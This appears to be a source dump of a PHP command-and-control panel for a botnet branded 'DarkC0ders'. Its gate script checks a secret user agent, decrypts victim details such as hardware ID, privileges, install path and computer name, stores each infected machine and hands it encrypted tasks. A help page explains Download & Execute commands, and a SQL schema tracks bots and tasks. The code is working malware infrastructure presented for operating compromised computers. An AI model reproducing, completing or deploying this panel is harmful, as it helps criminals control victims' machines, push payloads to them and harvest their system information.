10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | query("SELECT * FROM bots ORDER BY lastresponse DESC"); 27 | $unix = $odb->query("SELECT UNIX_TIMESTAMP()")->fetchColumn(0); 28 | while ($b = $bots->fetch(PDO::FETCH_ASSOC)) 29 | { 30 | $id = $b['id']; 31 | $ip = $b['ipaddress']; 32 | $cn = geoip_country_name_by_id($gi, $b['country']); 33 | $fl = strtolower(geoip_country_code_by_id($gi, $b['country'])); 34 | $lrd = $b['lastresponse']; 35 | $lr = date("m-d-Y, h:i A", $lrd); 36 | $ct = $b['currenttask']; 37 | $os = $b['operatingsys']; 38 | $bv = $b['botversion']; 39 | $st = ""; 40 | $mk = ""; 41 | if (($lrd + ($knock + 120)) > $unix) 42 | { 43 | $st = 'Online'; 44 | }else{ 45 | if ($lrd + $deadi < $unix) 46 | { 47 | $st = 'Dead'; 48 | }else{ 49 | $st = 'Offline'; 50 | } 51 | } 52 | if ($b['mark'] == "1") 53 | { 54 | $mk = 'Clean'; 55 | }else{ 56 | $mk = 'Dirty'; 57 | } 58 | echo ''; 59 | } 60 | ?> 61 | 62 |
#IP AddressCountryLast ResponseCurrent TaskOperating SystemBot VersionMarkStatus
'.$id.''.$ip.''.$cn.'  '.$lr.'#'.$ct.''.$os.''.$bv.'
'.$mk.'
'.$st.'
63 |
64 | 65 |
66 | 67 | 68 | 69 | 81 | 82 |
83 | -------------------------------------------------------------------------------- /Panel/page.php: -------------------------------------------------------------------------------- 1 | query("SELECT gate_status FROM settings")->fetchColumn(0); 7 | if ($gate != "1") 8 | { 9 | die(); 10 | } 11 | 12 | if (!isset($_POST['id']) || !isset($_POST['os']) || !isset($_POST['pv']) || !isset($_POST['ip']) || !isset($_POST['cn']) || !isset($_POST['bv'])) 13 | { 14 | include 'includes/404.php'; 15 | die(); 16 | } 17 | if ($_SERVER['HTTP_USER_AGENT'] != "E9BC3BD76216AFA560BFB5ACAF5731A3") 18 | { 19 | include 'includes/404.php'; 20 | die(); 21 | } 22 | 23 | $ip = $_SERVER['REMOTE_ADDR']; 24 | $country = geoip_country_id_by_addr($gi, $ip); 25 | 26 | $hwid = decrypt($deckey, $_POST['id']); 27 | $opsys = decrypt($deckey, $_POST['os']); 28 | $privs = decrypt($deckey, $_POST['pv']); 29 | $inpat = base64_encode(decrypt($deckey, $_POST['ip'])); 30 | $compn = base64_encode(decrypt($deckey, $_POST['cn'])); 31 | $botvr = decrypt($deckey, $_POST['bv']); 32 | $lastr = base64_encode(decrypt($deckey, $_POST['lr'])); 33 | $opera = "0"; 34 | $taskd = "0"; 35 | $unins = "0"; 36 | if (isset($_POST['op'])) 37 | { 38 | $opera = decrypt($deckey, $_POST['op']); 39 | } 40 | if (isset($_POST['td'])) 41 | { 42 | $taskd = decrypt($deckey, $_POST['td']); 43 | } 44 | if (isset($_POST['uni'])) 45 | { 46 | $unins = decrypt($deckey, $_POST['uni']); 47 | } 48 | 49 | if (!ctype_alnum($hwid) || !ctype_alnum($privs) || !ctype_alnum($opera) || !ctype_alnum($taskd) || !ctype_alnum($unins) || !preg_match('/^[a-z0-9 .]+$/i', $botvr) || !preg_match('/^[a-z0-9 .]+$/i', $opsys)) 50 | { 51 | include 'includes/404.php'; 52 | die(); 53 | } 54 | 55 | $exs = $odb->prepare("SELECT COUNT(*) FROM bots WHERE bothwid = :h"); 56 | $exs->execute(array(":h" => $hwid)); 57 | if ($exs->fetchColumn(0) == "0") 58 | { 59 | $i = $odb->prepare("INSERT INTO bots VALUES(NULL, :hw, :ip, :cn, UNIX_TIMESTAMP(), UNIX_TIMESTAMP(), :td, :os, :bv, :pv, :in, :cp, :lr, '1')"); 60 | $i->execute(array(":hw" => $hwid, ":ip" => $ip, ":cn" => $country, ":td" => $taskd, ":os" => $opsys, ":bv" => $botvr, ":pv" => $privs, ":in" => $inpat, ":cp" => $compn, ":lr" => $lastr)); 61 | }else{ 62 | $u = $odb->prepare("UPDATE bots SET lastresponse = UNIX_TIMESTAMP(), currenttask = :c WHERE bothwid = :h"); 63 | $u->execute(array(":c" => $taskd, ":h" => $hwid)); 64 | } 65 | 66 | if ($opera == "1") 67 | { 68 | $in = $odb->prepare("INSERT INTO tasks_completed VALUES(NULL, :h, :i)"); 69 | $in->execute(array(":h" => $hwid, ":i" => $taskd)); 70 | } 71 | if ($unins == "1") 72 | { 73 | $del = $odb->prepare("DELETE FROM bots WHERE bothwid = :h LIMIT 1"); 74 | $del->execute(array(":h" => $hwid)); 75 | } 76 | 77 | $cmds = $odb->query("SELECT * FROM tasks ORDER BY id"); 78 | while ($com = $cmds->fetch(PDO::FETCH_ASSOC)) 79 | { 80 | if ($com['status'] == "1") 81 | { 82 | $executions = $odb->query("SELECT COUNT(*) FROM tasks_completed WHERE taskid = '".$com['id']."'")->fetchColumn(0); 83 | if ($executions == $com['executions']) 84 | { 85 | continue; 86 | }else{ 87 | $ae = $odb->prepare("SELECT COUNT(*) FROM tasks_completed WHERE taskid = :i AND bothwid = :h"); 88 | $ae->execute(array(":i" => $com['id'], ":h" => $hwid)); 89 | if ($ae->fetchColumn(0) == 0) 90 | { 91 | echo encrypt($deckey, 'newtask:'.$com['id'].':'.base64_encode($com['task']).':'.base64_encode($com['params'])); 92 | break; 93 | } 94 | } 95 | } 96 | } 97 | ?> -------------------------------------------------------------------------------- /Panel/pages/help.php: -------------------------------------------------------------------------------- 1 | 4 |
5 |
6 |

Help

7 |
8 |
9 |
10 |
11 |
    12 |
  • 13 |
    14 | 15 |
    What language is DarkC0ders botnet programmed in?
    16 | 17 |
    18 |

    DarkC0ders special edition botnet is programmed in C#, using the .NET 2.0 Framework.

    19 |
  • 20 |
  • 21 |
    22 | 23 |
    What do I enter for a parameter?
    24 |
    25 |

    Parameters are only required for a few of the commands listed on the page. For example, if you wanted to execute the Download & Execute command, your parameter would be the link to the file you want downloaded & executed. Another example, if you wanted to view a webpage, your parameter would be the link to the page you want to view. There are only 3 categories that require parameters, and that is Downloads, Webpages, and Bot Management (Update).

    26 |
  • 27 | 28 |
29 |
30 | 31 | 32 |
33 |
34 |
35 |
    36 |
  • 37 |
    38 | 39 |
    What are dead bots?
    40 |
    41 |

    Bots that are marked dead have not connected to the panel in a specified amount of days. For example, the default limit is 7 days. Bots that have not connected to the panel within 7 days from their last connection, are then marked dead.

    42 |
  • 43 |
  • 44 |
    45 | 46 |
    What is 'Mark'?
    47 | 1
    48 |

    A Mark is a way to tell if the bot is known as 'Clean' or 'Dirty'. Dirty bots usually have other malware loaded onto the system besides DarkC0ders's bot. The user (you) marks the bot as dirty when running a command on the panel. You can also mark the bot as clean for future reference.

    49 |
  • 50 |
51 |
52 |
53 | 54 | 55 |
56 |
57 |
58 |
    59 | 60 |
  • 61 |
    62 | 63 |
    How do I use filters?
    64 | 65 | 1
    66 |

    Filters are used to include specific bots in a command, or exclude bots from a command. To use filters, you must specify what kind of filter it is. The format is as follows: filter:filter parameters;. For example, if you only wanted bots from the United States to execute your command, your filter would look something like this: country:united states;. The semicolon represents the end of this filter. If you wanted more than one value per filter, you would separate them with a comma. For example: country:united states,canada;. You can also have more than one filter at the same time. An example: country:canada;privileges:admin;. If you are still having trouble, feel free to contact me on FB for help. Filters are currently disabled while they're being re-worked.

    67 |
  • 68 |
69 |
70 |
71 |
72 |
73 | 74 | 75 |
76 | -------------------------------------------------------------------------------- /Panel/securimage/securimage_show.php: -------------------------------------------------------------------------------- 1 | 5 | * File: securimage_show.php
6 | * 7 | * Copyright (c) 2013, Drew Phillips 8 | * All rights reserved. 9 | * 10 | * Redistribution and use in source and binary forms, with or without modification, 11 | * are permitted provided that the following conditions are met: 12 | * 13 | * - Redistributions of source code must retain the above copyright notice, 14 | * this list of conditions and the following disclaimer. 15 | * - Redistributions in binary form must reproduce the above copyright notice, 16 | * this list of conditions and the following disclaimer in the documentation 17 | * and/or other materials provided with the distribution. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 20 | * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 21 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 22 | * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 23 | * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 24 | * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 25 | * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 26 | * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 27 | * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 28 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 29 | * POSSIBILITY OF SUCH DAMAGE. 30 | * 31 | * Any modifications to the library should be indicated clearly in the source code 32 | * to inform users that the changes are not a part of the original software.

33 | * 34 | * If you found this script useful, please take a quick moment to rate it.
35 | * http://www.hotscripts.com/rate/49400.html Thanks. 36 | * 37 | * @link http://www.phpcaptcha.org Securimage PHP CAPTCHA 38 | * @link http://www.phpcaptcha.org/latest.zip Download Latest Version 39 | * @link http://www.phpcaptcha.org/Securimage_Docs/ Online Documentation 40 | * @copyright 2013 Drew Phillips 41 | * @author Drew Phillips 42 | * @version 3.5.2 (Feb 15, 2014) 43 | * @package Securimage 44 | * 45 | */ 46 | 47 | // Remove the "//" from the following line for debugging problems 48 | // error_reporting(E_ALL); ini_set('display_errors', 1); 49 | 50 | require_once dirname(__FILE__) . '/securimage.php'; 51 | 52 | $img = new Securimage(); 53 | 54 | // You can customize the image by making changes below, some examples are included - remove the "//" to uncomment 55 | 56 | //$img->ttf_file = './Quiff.ttf'; 57 | //$img->captcha_type = Securimage::SI_CAPTCHA_MATHEMATIC; // show a simple math problem instead of text 58 | //$img->case_sensitive = true; // true to use case sensitve codes - not recommended 59 | //$img->image_height = 90; // height in pixels of the image 60 | //$img->image_width = $img->image_height * M_E; // a good formula for image size based on the height 61 | //$img->perturbation = .75; // 1.0 = high distortion, higher numbers = more distortion 62 | //$img->image_bg_color = new Securimage_Color("#0099CC"); // image background color 63 | //$img->text_color = new Securimage_Color("#EAEAEA"); // captcha text color 64 | //$img->num_lines = 8; // how many lines to draw over the image 65 | //$img->line_color = new Securimage_Color("#0000CC"); // color of lines over the image 66 | //$img->image_type = SI_IMAGE_JPEG; // render as a jpeg image 67 | //$img->signature_color = new Securimage_Color(rand(0, 64), 68 | // rand(64, 128), 69 | // rand(128, 255)); // random signature color 70 | 71 | // see securimage.php for more options that can be set 72 | 73 | // set namespace if supplied to script via HTTP GET 74 | if (!empty($_GET['namespace'])) $img->setNamespace($_GET['namespace']); 75 | 76 | 77 | $img->show(); // outputs the image and content headers to the browser 78 | // alternate use: 79 | // $img->show('/path/to/background_image.jpg'); 80 | -------------------------------------------------------------------------------- /Panel/database/darkcoders_net.sql.zip: -------------------------------------------------------------------------------- 1 | 2 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 3 | SET AUTOCOMMIT = 0; 4 | START TRANSACTION; 5 | SET time_zone = "+00:00"; 6 | 7 | 8 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 9 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 10 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 11 | /*!40101 SET NAMES utf8mb4 */; 12 | 13 | -- 14 | -- Database: `DarkC0ders` 15 | -- 16 | 17 | -- -------------------------------------------------------- 18 | 19 | -- 20 | -- Table structure for table `bots` 21 | -- 22 | 23 | DROP TABLE IF EXISTS `bots`; 24 | CREATE TABLE IF NOT EXISTS `bots` ( 25 | `id` int(255) NOT NULL AUTO_INCREMENT, 26 | `bothwid` varchar(100) NOT NULL, 27 | `ipaddress` varchar(75) NOT NULL, 28 | `country` int(5) NOT NULL, 29 | `installdate` int(50) NOT NULL, 30 | `lastresponse` int(50) NOT NULL, 31 | `currenttask` int(255) NOT NULL, 32 | `operatingsys` varchar(300) NOT NULL, 33 | `botversion` varchar(30) NOT NULL, 34 | `privileges` varchar(5) NOT NULL, 35 | `installationpath` text NOT NULL, 36 | `computername` text NOT NULL, 37 | `lastreboot` text NOT NULL, 38 | `mark` int(1) NOT NULL, 39 | PRIMARY KEY (`id`) 40 | ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1; 41 | 42 | -- -------------------------------------------------------- 43 | 44 | -- 45 | -- Table structure for table `plogs` 46 | -- 47 | 48 | DROP TABLE IF EXISTS `plogs`; 49 | CREATE TABLE IF NOT EXISTS `plogs` ( 50 | `id` int(255) NOT NULL AUTO_INCREMENT, 51 | `username` varchar(50) NOT NULL, 52 | `ipaddress` varchar(75) NOT NULL, 53 | `action` text NOT NULL, 54 | `date` int(50) NOT NULL, 55 | PRIMARY KEY (`id`) 56 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; 57 | 58 | -- -------------------------------------------------------- 59 | 60 | -- 61 | -- Table structure for table `settings` 62 | -- 63 | 64 | DROP TABLE IF EXISTS `settings`; 65 | CREATE TABLE IF NOT EXISTS `settings` ( 66 | `id` int(255) NOT NULL AUTO_INCREMENT, 67 | `knock` int(10) NOT NULL, 68 | `dead` int(10) NOT NULL, 69 | `gate_status` int(1) NOT NULL, 70 | `stub_id` varchar(200) NOT NULL, 71 | PRIMARY KEY (`id`) 72 | ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; 73 | 74 | -- 75 | -- Dumping data for table `settings` 76 | -- 77 | 78 | INSERT INTO `settings` (`id`, `knock`, `dead`, `gate_status`, `stub_id`) VALUES 79 | (1, 1, 7, 1, ''); 80 | 81 | -- -------------------------------------------------------- 82 | 83 | -- 84 | -- Table structure for table `tasks` 85 | -- 86 | 87 | DROP TABLE IF EXISTS `tasks`; 88 | CREATE TABLE IF NOT EXISTS `tasks` ( 89 | `id` int(255) NOT NULL AUTO_INCREMENT, 90 | `task` varchar(100) NOT NULL, 91 | `params` text NOT NULL, 92 | `filters` text NOT NULL, 93 | `executions` varchar(100) NOT NULL, 94 | `username` varchar(50) NOT NULL, 95 | `status` int(1) NOT NULL, 96 | `date` int(50) NOT NULL, 97 | PRIMARY KEY (`id`) 98 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; 99 | 100 | -- -------------------------------------------------------- 101 | 102 | -- 103 | -- Table structure for table `tasks_completed` 104 | -- 105 | 106 | DROP TABLE IF EXISTS `tasks_completed`; 107 | CREATE TABLE IF NOT EXISTS `tasks_completed` ( 108 | `id` int(255) NOT NULL AUTO_INCREMENT, 109 | `bothwid` varchar(100) NOT NULL, 110 | `taskid` int(255) NOT NULL, 111 | PRIMARY KEY (`id`) 112 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1; 113 | 114 | -- -------------------------------------------------------- 115 | 116 | -- 117 | -- Table structure for table `users` 118 | -- 119 | 120 | DROP TABLE IF EXISTS `users`; 121 | CREATE TABLE IF NOT EXISTS `users` ( 122 | `id` int(255) NOT NULL AUTO_INCREMENT, 123 | `username` varchar(50) NOT NULL, 124 | `password` varchar(300) NOT NULL, 125 | `privileges` varchar(300) NOT NULL, 126 | `status` int(1) NOT NULL, 127 | PRIMARY KEY (`id`) 128 | ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; 129 | 130 | -- 131 | -- Dumping data for table `users` 132 | -- 133 | 134 | INSERT INTO `users` (`id`, `username`, `password`, `privileges`, `status`) VALUES 135 | (1, 'admin', '8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918', 'admin', 1); 136 | COMMIT; 137 | 138 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 139 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 140 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 141 | -------------------------------------------------------------------------------- /Panel/login/index.php: -------------------------------------------------------------------------------- 1 | check($captcha_code) != false) 9 | { 10 | include '../includes/config.php'; 11 | $username = $_POST['username']; 12 | $password = hash("sha256", $_POST['password']); 13 | if (ctype_alnum($username)) 14 | { 15 | $sel = $odb->prepare("SELECT id,password FROM users WHERE username = :user"); 16 | $sel->execute(array(":user" => $username)); 17 | list($userid,$pass) = $sel->fetch(); 18 | if ($pass != "" || $pass != NULL) 19 | { 20 | if ($password == $pass) 21 | { 22 | $i = $odb->prepare("INSERT INTO plogs VALUES(NULL, :user, :ip, :act, UNIX_TIMESTAMP())"); 23 | $i->execute(array(":user" => $username, ":ip" => $_SERVER['REMOTE_ADDR'], ":act" => "Logged in")); 24 | $_SESSION['DarkC0ders'] = $username.":".$userid; 25 | header("Location: ../"); 26 | } 27 | } 28 | } 29 | } 30 | } 31 | ?> 32 | 33 | 34 | 35 | 36 | 37 | 67 | 68 | 69 | 70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 | 78 |
79 |
80 | Login with Your Accountadd 81 |

© DarkC0ders.world

82 | 83 |
84 |
85 | Loginclose 86 |
87 |
88 |
89 |
90 |
91 | 92 |
93 |
94 | 95 | 96 | 97 |
98 |
99 | 100 |
101 |
102 | 103 | 104 |
105 |
106 | 107 | 108 | 109 |
110 |
CAPTCHA Image
111 |
112 | 113 |
114 |
115 |
116 | 117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 | 125 |
126 | 127 | 128 |
129 | 130 | 131 | 132 | 133 | 134 | -------------------------------------------------------------------------------- /Panel/pages/details.php: -------------------------------------------------------------------------------- 1 | 4 | 5 |
6 |
7 |

Bot Details

8 | 9 |
10 |
11 | 12 | Specified ID is not valid. Redirecting...
'; 18 | die(); 19 | }else{ 20 | $cnt = $odb->prepare("SELECT COUNT(*) FROM bots WHERE id = :id"); 21 | $cnt->execute(array(":id" => $_GET['id'])); 22 | if (!($cnt->fetchColumn(0) > 0)) 23 | { 24 | echo '
Specified ID was not found in database. Redirecting...
'; 25 | die(); 26 | } 27 | } 28 | if (isset($_GET['del']) && $_GET['del'] == "1") 29 | { 30 | $del = $odb->prepare("DELETE FROM bots WHERE id = :id LIMIT 1"); 31 | $del->execute(array(":id" => $_GET['id'])); 32 | $in = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, :r, UNIX_TIMESTAMP())"); 33 | $in->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'], ":r" => 'Deleted bot #'.$_GET['id'])); 34 | echo '
Bot deleted successfully. Redirecting...
'; 35 | die(); 36 | } 37 | if (isset($_GET['mark'])) 38 | { 39 | $m = $_GET['mark']; 40 | if ($m == "1") 41 | { 42 | $mark = $odb->prepare("UPDATE bots SET mark = :mark WHERE id = :id LIMIT 1"); 43 | $mark->execute(array(":mark" => "1", ":id" => $_GET['id'])); 44 | echo '
Bot marked successfully.Redirecting...
'; 45 | }elseif ($m == "2"){ 46 | $mark = $odb->prepare("UPDATE bots SET mark = :mark WHERE id = :id LIMIT 1"); 47 | $mark->execute(array(":mark" => "2", ":id" => $_GET['id'])); 48 | echo '
Bot marked successfully.Redirecting...
'; 49 | } 50 | } 51 | } 52 | ?> 53 |
54 | 55 | Go back
56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | prepare("SELECT * FROM bots WHERE id = :id"); 65 | $details->execute(array(":id" => $_GET['id'])); 66 | $d = $details->fetch(PDO::FETCH_ASSOC); 67 | ?> 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 |
KeyValue
ID
HWID
IP Address
Country'; ?>
Install Date
Last Response
Current Task#
Computer Name
Operating System
Privileges
Installation Path
Last Reboot
Bot Version
84 |
85 | This bot is marked as Clean
Mark bot as dirty'; 89 | }else{ 90 | echo '
This bot is marked as Dirty

Mark bot as clean'; 91 | } 92 | ?> 93 | Delete Bot 94 |
95 |
96 | 97 | 98 | 99 | 100 |
101 | 103 | -------------------------------------------------------------------------------- /Panel/pages/account.php: -------------------------------------------------------------------------------- 1 | 4 |
5 |
6 |

My Account

7 |
One of the fields were empty.
'; 16 | }else{ 17 | if ($newpass == $newpas2) 18 | { 19 | $oh = hash("sha256", $oldpass); 20 | $op_sql = $odb->prepare("SELECT password FROM users WHERE username = :u"); 21 | $op_sql->execute(array(":u" => $username)); 22 | $op = $op_sql->fetchColumn(0); 23 | if ($oh == $op) 24 | { 25 | $nh = hash("sha256", $newpass); 26 | $up = $odb->prepare("UPDATE users SET password = :p WHERE username = :u"); 27 | $up->execute(array(":p" => $nh, ":u" => $username)); 28 | echo '
Password has been changed successfully. Reloading...
'; 29 | 30 | }else{ 31 | echo '
Current password was incorrect.
'; 32 | } 33 | }else{ 34 | echo '
New password did not match.
'; 35 | } 36 | } 37 | } 38 | 39 | ?> 40 | 41 | 42 |
43 |
44 | 45 | prepare("SELECT ipaddress FROM plogs WHERE username = :u AND action = 'Logged in' ORDER BY date DESC LIMIT 1,1"); 47 | $ls->execute(array(":u" => $username)); 48 | $l = $ls->fetchColumn(0); 49 | if ($l == "" || $l == NULL) 50 | { 51 | $l = "Unknown"; 52 | }else{ 53 | $l .= ' '; 54 | } 55 | ?> 56 | fingerprint 57 | swap_vertLast Known IP: 58 | 59 | 60 |
61 |
62 |
63 |
64 | 70 |
71 |
72 |
73 |
74 | 75 |
76 |
77 | 78 | 79 |
80 | 81 | 82 |
83 | 84 | 85 |
86 | 87 |
88 | 89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 | 97 |
98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | prepare("SELECT * FROM plogs WHERE username = :u ORDER BY date DESC LIMIT 5"); 113 | $lgs->execute(array(":u" => $username)); 114 | while ($lg = $lgs->fetch(PDO::FETCH_ASSOC)) 115 | { 116 | echo ''; 117 | } 118 | ?> 119 | 120 |
#IP AddressActionDate
'.$lg['id'].''.$lg['ipaddress'].' '.$lg['action'].''.date("m-d-Y, h:i A", $lg['date']).'
121 | 122 | 123 | 124 | 125 |
126 | 127 | 128 |
129 |
130 |
131 | 132 |
133 | 134 |
135 | -------------------------------------------------------------------------------- /Panel/includes/header.php: -------------------------------------------------------------------------------- 1 | query("SELECT privileges FROM users WHERE username = '".$username."'")->fetchColumn(0); 5 | 6 | include 'includes/stats.php'; 7 | include 'includes/geo/geoip.inc'; 8 | $gi = geoip_open("includes/geo/GeoIP.dat", ""); 9 | ?> 10 | 11 | 12 | 13 | 14 | 15 | 16 | DarkCOders Net 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 | 50 | 67 |
68 |
    69 | 70 |
  • 71 | 73 | 74 |
  • 75 |
  • 76 | Dashboard 77 |
  • 78 |
  • 79 | Bots 80 |
  • 81 | 82 |
  • 83 | Tasks 85 |
  • 86 |
  • 87 | 88 |
  • 89 | 90 | Settings 92 |
  • 93 |
  • 94 | Users 95 |
  • 96 |
  • 97 | Panel Logs 98 |
  • 99 | 100 |
  • 101 | Help 102 |
  • 103 | 104 | 105 | 106 |
  • 107 | Help 108 |
  • 109 | 110 |
111 |
112 |
-------------------------------------------------------------------------------- /Panel/assets/css/dataTables.bootstrap.css: -------------------------------------------------------------------------------- 1 | div.dataTables_length label { 2 | font-weight: normal; 3 | float: left; 4 | text-align: left; 5 | } 6 | 7 | div.dataTables_length select { 8 | width: 75px; 9 | } 10 | 11 | div.dataTables_filter label { 12 | font-weight: normal; 13 | float: right; 14 | } 15 | 16 | div.dataTables_filter input { 17 | width: 16em; 18 | } 19 | 20 | div.dataTables_info { 21 | padding-top: 8px; 22 | } 23 | 24 | div.dataTables_paginate { 25 | float: right; 26 | margin: 0; 27 | } 28 | 29 | div.dataTables_paginate ul.pagination { 30 | margin: 2px 0; 31 | white-space: nowrap; 32 | } 33 | 34 | table.dataTable, 35 | table.dataTable td, 36 | table.dataTable th { 37 | -webkit-box-sizing: content-box; 38 | -moz-box-sizing: content-box; 39 | box-sizing: content-box; 40 | } 41 | 42 | 43 | table.dataTable { 44 | clear: both; 45 | margin-top: 6px !important; 46 | margin-bottom: 6px !important; 47 | max-width: none !important; 48 | } 49 | 50 | table.dataTable thead .sorting, 51 | table.dataTable thead .sorting_asc, 52 | table.dataTable thead .sorting_desc, 53 | table.dataTable thead .sorting_asc_disabled, 54 | table.dataTable thead .sorting_desc_disabled { 55 | cursor: pointer; 56 | } 57 | 58 | table.dataTable thead .sorting { background: url('images/sort_both.png') no-repeat center right; } 59 | table.dataTable thead .sorting_asc { background: url('images/sort_asc.png') no-repeat center right; } 60 | table.dataTable thead .sorting_desc { background: url('images/sort_desc.png') no-repeat center right; } 61 | 62 | table.dataTable thead .sorting_asc_disabled { background: url('images/sort_asc_disabled.png') no-repeat center right; } 63 | table.dataTable thead .sorting_desc_disabled { background: url('images/sort_desc_disabled.png') no-repeat center right; } 64 | 65 | table.dataTable th:active { 66 | outline: none; 67 | } 68 | 69 | /* Scrolling */ 70 | div.dataTables_scrollHead table { 71 | margin-bottom: 0 !important; 72 | border-bottom-left-radius: 0; 73 | border-bottom-right-radius: 0; 74 | } 75 | 76 | div.dataTables_scrollHead table thead tr:last-child th:first-child, 77 | div.dataTables_scrollHead table thead tr:last-child td:first-child { 78 | border-bottom-left-radius: 0 !important; 79 | border-bottom-right-radius: 0 !important; 80 | } 81 | 82 | div.dataTables_scrollBody table { 83 | border-top: none; 84 | margin-top: 0 !important; 85 | margin-bottom: 0 !important; 86 | } 87 | 88 | div.dataTables_scrollBody tbody tr:first-child th, 89 | div.dataTables_scrollBody tbody tr:first-child td { 90 | border-top: none; 91 | } 92 | 93 | div.dataTables_scrollFoot table { 94 | margin-top: 0 !important; 95 | border-top: none; 96 | } 97 | 98 | 99 | 100 | 101 | /* 102 | * TableTools styles 103 | */ 104 | .table tbody tr.active td, 105 | .table tbody tr.active th { 106 | background-color: #08C; 107 | color: white; 108 | } 109 | 110 | .table tbody tr.active:hover td, 111 | .table tbody tr.active:hover th { 112 | background-color: #0075b0 !important; 113 | } 114 | 115 | .table tbody tr.active a { 116 | color: white; 117 | } 118 | 119 | .table-striped tbody tr.active:nth-child(odd) td, 120 | .table-striped tbody tr.active:nth-child(odd) th { 121 | background-color: #017ebc; 122 | } 123 | 124 | table.DTTT_selectable tbody tr { 125 | cursor: pointer; 126 | } 127 | 128 | div.DTTT .btn { 129 | color: #333 !important; 130 | font-size: 12px; 131 | } 132 | 133 | div.DTTT .btn:hover { 134 | text-decoration: none !important; 135 | } 136 | 137 | ul.DTTT_dropdown.dropdown-menu { 138 | z-index: 2003; 139 | } 140 | 141 | ul.DTTT_dropdown.dropdown-menu a { 142 | color: #333 !important; /* needed only when demo_page.css is included */ 143 | } 144 | 145 | ul.DTTT_dropdown.dropdown-menu li { 146 | position: relative; 147 | } 148 | 149 | ul.DTTT_dropdown.dropdown-menu li:hover a { 150 | background-color: #0088cc; 151 | color: white !important; 152 | } 153 | 154 | div.DTTT_collection_background { 155 | z-index: 2002; 156 | } 157 | 158 | /* TableTools information display */ 159 | div.DTTT_print_info.modal { 160 | height: 150px; 161 | margin-top: -75px; 162 | text-align: center; 163 | } 164 | 165 | div.DTTT_print_info h6 { 166 | font-weight: normal; 167 | font-size: 28px; 168 | line-height: 28px; 169 | margin: 1em; 170 | } 171 | 172 | div.DTTT_print_info p { 173 | font-size: 14px; 174 | line-height: 20px; 175 | } 176 | 177 | 178 | 179 | /* 180 | * FixedColumns styles 181 | */ 182 | div.DTFC_LeftHeadWrapper table, 183 | div.DTFC_LeftFootWrapper table, 184 | div.DTFC_RightHeadWrapper table, 185 | div.DTFC_RightFootWrapper table, 186 | table.DTFC_Cloned tr.even { 187 | background-color: white; 188 | } 189 | 190 | div.DTFC_RightHeadWrapper table , 191 | div.DTFC_LeftHeadWrapper table { 192 | margin-bottom: 0 !important; 193 | border-top-right-radius: 0 !important; 194 | border-bottom-left-radius: 0 !important; 195 | border-bottom-right-radius: 0 !important; 196 | } 197 | 198 | div.DTFC_RightHeadWrapper table thead tr:last-child th:first-child, 199 | div.DTFC_RightHeadWrapper table thead tr:last-child td:first-child, 200 | div.DTFC_LeftHeadWrapper table thead tr:last-child th:first-child, 201 | div.DTFC_LeftHeadWrapper table thead tr:last-child td:first-child { 202 | border-bottom-left-radius: 0 !important; 203 | border-bottom-right-radius: 0 !important; 204 | } 205 | 206 | div.DTFC_RightBodyWrapper table, 207 | div.DTFC_LeftBodyWrapper table { 208 | border-top: none; 209 | margin-bottom: 0 !important; 210 | } 211 | 212 | div.DTFC_RightBodyWrapper tbody tr:first-child th, 213 | div.DTFC_RightBodyWrapper tbody tr:first-child td, 214 | div.DTFC_LeftBodyWrapper tbody tr:first-child th, 215 | div.DTFC_LeftBodyWrapper tbody tr:first-child td { 216 | border-top: none; 217 | } 218 | 219 | div.DTFC_RightFootWrapper table, 220 | div.DTFC_LeftFootWrapper table { 221 | border-top: none; 222 | } 223 | 224 | -------------------------------------------------------------------------------- /Panel/assets/css/preloader-stage.css: -------------------------------------------------------------------------------- 1 | /* -------------------------------------------------+ 2 | Title: 